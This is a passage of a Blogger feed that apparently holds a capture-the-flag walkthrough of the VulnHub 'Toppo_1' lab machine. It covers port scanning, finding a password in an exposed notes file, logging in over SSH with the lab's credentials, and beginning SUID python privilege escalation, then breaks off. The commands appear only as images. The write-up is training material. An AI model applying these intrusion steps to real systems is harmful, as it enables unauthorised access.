href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjPRD223ROIrbO1hZ-ZuypKi8SJtX4qbvT6NM5NtLBwRjK_upTT8tn6ymButDIXrC_QAQYcl9G71Cxc2SrIBhBHa8Ky7SG_XTo1l1NW2l3lhPWYjtt211XtzN1JiKqaTIfQjliBYE2F6Ag59xhAb8aqiERY445kZGdangeXSaTgsFhy_2DKFxW_yZdy7w&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;121&quot; data-original-width=&quot;511&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjPRD223ROIrbO1hZ-ZuypKi8SJtX4qbvT6NM5NtLBwRjK_upTT8tn6ymButDIXrC_QAQYcl9G71Cxc2SrIBhBHa8Ky7SG_XTo1l1NW2l3lhPWYjtt211XtzN1JiKqaTIfQjliBYE2F6Ag59xhAb8aqiERY445kZGdangeXSaTgsFhy_2DKFxW_yZdy7w=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #6fa8dc; font-size: medium;&quot;&gt;5 - CAPTURING THE FLAG&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Reading &lt;b&gt;proof.txt&lt;/b&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEg1Wa8NPEYmtrWGOUOoKalWFAwGtG5Fm-sZazEfrZptVYMUW1aqSsBpg8RmNOL2M1kEG1Bun5RaBO03JUXNloLRaPzKA9HYOTYnA7edJFahgYQzmoVCJHuG5qchSKlu75Gr2h8Mi2F0E7vKQVovKMrfqveRNwbK9mygtCcrCa3-XGc6Ye7m1pi5Ky-6HA&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;854&quot; data-original-width=&quot;805&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEg1Wa8NPEYmtrWGOUOoKalWFAwGtG5Fm-sZazEfrZptVYMUW1aqSsBpg8RmNOL2M1kEG1Bun5RaBO03JUXNloLRaPzKA9HYOTYnA7edJFahgYQzmoVCJHuG5qchSKlu75Gr2h8Mi2F0E7vKQVovKMrfqveRNwbK9mygtCcrCa3-XGc6Ye7m1pi5Ky-6HA=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/1947953814412763707/posts/default/193756961884008845'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/1947953814412763707/posts/default/193756961884008845'/><link rel='alternate' type='text/html' href='https://www.whitelist1.com/2022/02/symfonos1.html' title='Symfonos_1'/><author><name>Whitelist</name><uri>http://www.blogger.com/profile/11945670003912610776</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/a/AVvXsEhjZIl_JB0Nns-hwjRUspyddC29kR7JbsdT4J8TJQHN0s0KV5bcjCJkcLLdag3_h8cULqXTMN5X4X9FtrG7rHVeIM-D1xObcTEPd8xyen58AA1fnmZnpcrQmn8yoxNzjgK2XI0fHUjePo0cfIoxUTkNSj7l3Z-XFDeOs6NpklNqYHGh6WjNTrHOJ2_NnQ=s72-c" height="72" width="72"/></entry><entry><id>tag:blogger.com,1999:blog-1947953814412763707.post-1340956702613518385</id><published>2022-02-06T16:36:00.000-06:00</published><updated>2022-02-06T16:36:51.308-06:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="CAPTURE THE FLAG -   VULNERABLE MACHINES"/><title type='text'>Toppo_1</title><content type='html'>&lt;p&gt;&lt;b&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&amp;nbsp;TOPPO_1&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Layout for this exercise:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhKc6UrP31n82oSCc0-awWjHoCwtzDfu2ub2t5iX0UNfT3T-TIq51rwF23FKVCE1wbQLdu-xzH4Wf8c38Mz1vQ4XBUYOmAj1k87ZkVlSqjP2s8277mxjvi_thdQOHOwhKuR_4h0ddE26vjs8Y3C2WYuv3EwD18HV49a6QGiYcz3a9fvlRng2NxF8k15fA=s626&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;243&quot; data-original-width=&quot;626&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhKc6UrP31n82oSCc0-awWjHoCwtzDfu2ub2t5iX0UNfT3T-TIq51rwF23FKVCE1wbQLdu-xzH4Wf8c38Mz1vQ4XBUYOmAj1k87ZkVlSqjP2s8277mxjvi_thdQOHOwhKuR_4h0ddE26vjs8Y3C2WYuv3EwD18HV49a6QGiYcz3a9fvlRng2NxF8k15fA=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;1 - INTRODUCTION&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&amp;nbsp;- The goal of this exercise is to develop a hacking process for the vulnerable machine &lt;b&gt;Toppo_1&lt;/b&gt;, from the VulnHub pentesting platform.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- &lt;b&gt;Toppo_1&lt;/b&gt; can be downloaded from here:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://www.vulnhub.com/entry/toppo-1,245/&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;https://www.vulnhub.com/entry/toppo-1,245/&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Once the virtual machine downloaded and extracted with VirtualBox:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEheDULrP_tDz0jBOnXKayf4Caru2rA6oCSg66xZ2ezhg9HjvricylcUQ77xV2z17RROlV1TgiVKztStc58KiJK5rUzwNYaVwVLDmzof0SyK-Zchf9Sxj_iCYNENKQwzuy-byQmEEZciCz7eLql-lwo19tcMi8QyqKCrLMnTQK4NLPBydRMJGLTR8Yyrkw=s366&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;305&quot; data-original-width=&quot;366&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEheDULrP_tDz0jBOnXKayf4Caru2rA6oCSg66xZ2ezhg9HjvricylcUQ77xV2z17RROlV1TgiVKztStc58KiJK5rUzwNYaVwVLDmzof0SyK-Zchf9Sxj_iCYNENKQwzuy-byQmEEZciCz7eLql-lwo19tcMi8QyqKCrLMnTQK4NLPBydRMJGLTR8Yyrkw=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;2&amp;nbsp;- ENUMERATION&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Scanning all ports with Nmap:&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgazFpBpPhyXxfz_R0nugEiy9cgVLENhTiQE0TqRN1wN37Mt0RTtsLG5kFigbMjvW17Oi35kay_1Ftl5Qizvg3paU1W8LOeco7Kjdnazf2EhuT3BtKJUjQS1aXXznwBzzS-s032PjKfNRij11iedsmt6_ARVyYTE77LorO0atx8z-Ih4y0Rj1bhElflhQ=s441&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;232&quot; data-original-width=&quot;441&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgazFpBpPhyXxfz_R0nugEiy9cgVLENhTiQE0TqRN1wN37Mt0RTtsLG5kFigbMjvW17Oi35kay_1Ftl5Qizvg3paU1W8LOeco7Kjdnazf2EhuT3BtKJUjQS1aXXznwBzzS-s032PjKfNRij11iedsmt6_ARVyYTE77LorO0atx8z-Ih4y0Rj1bhElflhQ=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Dirbusting the web server we find a directory called &lt;b&gt;/admin&lt;/b&gt;:&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgZvl_ked0wSOD3ggTsYq1GNlR4AfnrqcEE5KDxGUhjoH4VL3eGRVmXwG9d-_4_uJyrqNzBp7tpqPo2Q-tOlauOZMmq-RcmNHg3eMPUhsuECl3VzmdnhxrswvUX3QaGXnKFajYVgkMq5n6PuU5QH1JDdsz-FWdjbnaRf8nPYEqE4u--0n_GzhdYNxg6JA=s639&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;634&quot; data-original-width=&quot;639&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgZvl_ked0wSOD3ggTsYq1GNlR4AfnrqcEE5KDxGUhjoH4VL3eGRVmXwG9d-_4_uJyrqNzBp7tpqPo2Q-tOlauOZMmq-RcmNHg3eMPUhsuECl3VzmdnhxrswvUX3QaGXnKFajYVgkMq5n6PuU5QH1JDdsz-FWdjbnaRf8nPYEqE4u--0n_GzhdYNxg6JA=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Browsing the web server:&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhcMutIVSfrfJYpEtgmdtOUcq0n8VvToR-e11MogWjhhKwvMyXklTGXKpl9OLs70heVpIPljruDyBm1VQYyVpUi3sYgsTgQLv_kbknqHvhDo_H7Df-uIjPkMMxMi8G8DbXJflMzQPZCCdVeS9MZxghKyJGjaVE5Fc9f1DBZOiqRn1NKXP4K5dccDC8H9Q=s860&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;860&quot; data-original-width=&quot;693&quot; height=&quot;709&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhcMutIVSfrfJYpEtgmdtOUcq0n8VvToR-e11MogWjhhKwvMyXklTGXKpl9OLs70heVpIPljruDyBm1VQYyVpUi3sYgsTgQLv_kbknqHvhDo_H7Df-uIjPkMMxMi8G8DbXJflMzQPZCCdVeS9MZxghKyJGjaVE5Fc9f1DBZOiqRn1NKXP4K5dccDC8H9Q=w572-h709&quot; width=&quot;572&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Going to &lt;b&gt;/admin&lt;/b&gt; there is a text file called &lt;b&gt;notes.txt&lt;/b&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhGi8IkyTURUQ5eME4Amu8ypqyAdqaLQjZ4ZISNPvY16HUO5Q4IQ9N9ANWk8DFBHVGxZgW75fzfq0RZBwxWRgJ_e8QpadOSZ3-e13MyQbQVLSTZgCCFpkRof5D2_BoAGg803ml8WsyGm1V28moaWOpT-2VfdDNOG6VYVZ12VnlASH7X8VQ4oifD43RKMQ=s477&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;320&quot; data-original-width=&quot;477&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhGi8IkyTURUQ5eME4Amu8ypqyAdqaLQjZ4ZISNPvY16HUO5Q4IQ9N9ANWk8DFBHVGxZgW75fzfq0RZBwxWRgJ_e8QpadOSZ3-e13MyQbQVLSTZgCCFpkRof5D2_BoAGg803ml8WsyGm1V28moaWOpT-2VfdDNOG6VYVZ12VnlASH7X8VQ4oifD43RKMQ=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Reading &lt;b&gt;notes.txt&lt;/b&gt; there is a message about a potential password, either &lt;b&gt;:/ 12345ted123&lt;/b&gt; or maybe just &lt;b&gt;12345ted123&lt;/b&gt;. Later we will try some related options:&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhXWQgXM33hGt8ruJs1WVUGOyIwMY1c52LbicjFcQ3u-2K_sJO0kM7opZ_OT4bUfdtqLdCme1_otYCEM-2XFfs3MGCcmxfEdIREjZsNimyuOLyW4B5lbxlcSxixQynSUBSeJgpYPMv1ZbwjFdJOWb7g0GXjhHjADHEgsnGBmvg1G-yQsq4BGXcwbmIvYg=s691&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;194&quot; data-original-width=&quot;691&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhXWQgXM33hGt8ruJs1WVUGOyIwMY1c52LbicjFcQ3u-2K_sJO0kM7opZ_OT4bUfdtqLdCme1_otYCEM-2XFfs3MGCcmxfEdIREjZsNimyuOLyW4B5lbxlcSxixQynSUBSeJgpYPMv1ZbwjFdJOWb7g0GXjhHjADHEgsnGBmvg1G-yQsq4BGXcwbmIvYg=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;3 - EXPLOITATION&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- SSH with credentials &lt;b&gt;ted:12345ted123&lt;/b&gt; it works:&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEg_9S2P-gptnvKQtFzv-U7y9XBUk2ulwgXKCJimiyS76146wZmwHGZs7uj5tu40g49kZM-Jj_PDTP3gNk1GomTtWo3ACrZI3iDdfUdYM3nkriiQEHvUDHXB7w37Ew6rPl8Lnv3IS-r94ZYQwtEZYdxUb1lKj0YGr8vw3VigHH7nncxjZdrglQAFLEeakw=s827&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;325&quot; data-original-width=&quot;827&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEg_9S2P-gptnvKQtFzv-U7y9XBUk2ulwgXKCJimiyS76146wZmwHGZs7uj5tu40g49kZM-Jj_PDTP3gNk1GomTtWo3ACrZI3iDdfUdYM3nkriiQEHvUDHXB7w37Ew6rPl8Lnv3IS-r94ZYQwtEZYdxUb1lKj0YGr8vw3VigHH7nncxjZdrglQAFLEeakw=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;4 -&amp;nbsp;PRIVILEGE ESCALATION&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Looking for files with bit&amp;nbsp;&lt;b&gt;SUID&lt;/b&gt; we focus our attention on&amp;nbsp;&lt;b&gt;/usr/bin/python2.7&lt;/b&gt;:&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiS02im2XzIqSIBjF_bdRki3HNMY3u1hHvAqHsh180ZjwXmD51NFC0P6KmBaWBLpotqZPvKcWN8tnl3OamoLNnpRq4sxScbd91nCS8w__A-PpfRuIzn1W0z3WpyZB1Ii_z3Xj84jOIpAGxEYDJgTTL1gk-Y5JW0bne6q9Hr93C1SucdDz2o2Q2BWuDRSg=s568&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;415&quot; data-original-width=&quot;568&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiS02im2XzIqSIBjF_bdRki3HNMY3u1hHvAqHsh180ZjwXmD51NFC0P6KmBaWBLpotqZPvKcWN8tnl3OamoLNnpRq4sxScbd91nCS8w__A-PpfRuIzn1W0z3WpyZB1Ii_z3Xj84jOIpAGxEYDJgTTL1gk-Y5JW0bne6q9Hr93C1SucdDz2o2Q2BWuDRSg=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- &lt;b&gt;/usr/bin/python2.7&lt;/b&gt; is owned by &lt;b&gt;root&lt;/b&gt;, and also it has enabled the bit SUID:&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgW-LfSLUA6Q1JyN91_gboulCogR4xX7o7M1RyckutQFwUQvlxN0wc5rKX24njPsDKBBc4pSV3SsqG8cV_LWXW0nV54cgDdKlval0vv1U-ZpVQruotYtSFSkqa61it_K4B_bNdVH0h7e5alLPvk0vY8QFfiEgc4p4c7TT2heO6DMtsFft8ImA4kiQiujQ=s692&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;46&quot; data-original-width=&quot;692&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgW-LfSLUA6Q1JyN91_gboulCogR4xX7o7M1RyckutQFwUQvlxN0wc5rKX24njPsDKBBc4pSV3SsqG8cV_LWXW0nV54cgDdKlval0vv1U-ZpVQruotYtSFSkqa61it_K4B_bNdVH0h7e5alLPvk0vY8QFfiEgc4p4c7TT2heO6DMtsFft8ImA4kiQiujQ=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br 